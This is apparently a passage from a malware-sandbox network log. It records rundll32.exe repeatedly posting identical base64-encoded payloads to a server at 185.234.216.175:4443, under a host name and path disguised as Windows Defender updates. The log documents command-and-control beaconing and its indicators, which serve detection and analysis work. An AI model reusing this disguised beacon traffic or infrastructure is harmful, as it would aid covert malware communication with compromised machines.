Dec 6, 2024 22:11:47.020160913 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:48.580118895 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:48.848064899 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:50.558316946 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:50.817152977 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:52.595845938 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:52.862803936 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:54.421314001 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:54.676695108 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:56.118963957 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:56.384737968 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:57.810697079 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49755	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:58.066684961 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:59.532725096 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49757	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:59.802364111 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:01.250874043 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49758	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:01.526325941 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:02.970766068 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49765	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:03.237633944 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:04.690690041 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49771	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:04.963887930 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:06.439241886 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49772	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:06.714191914 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
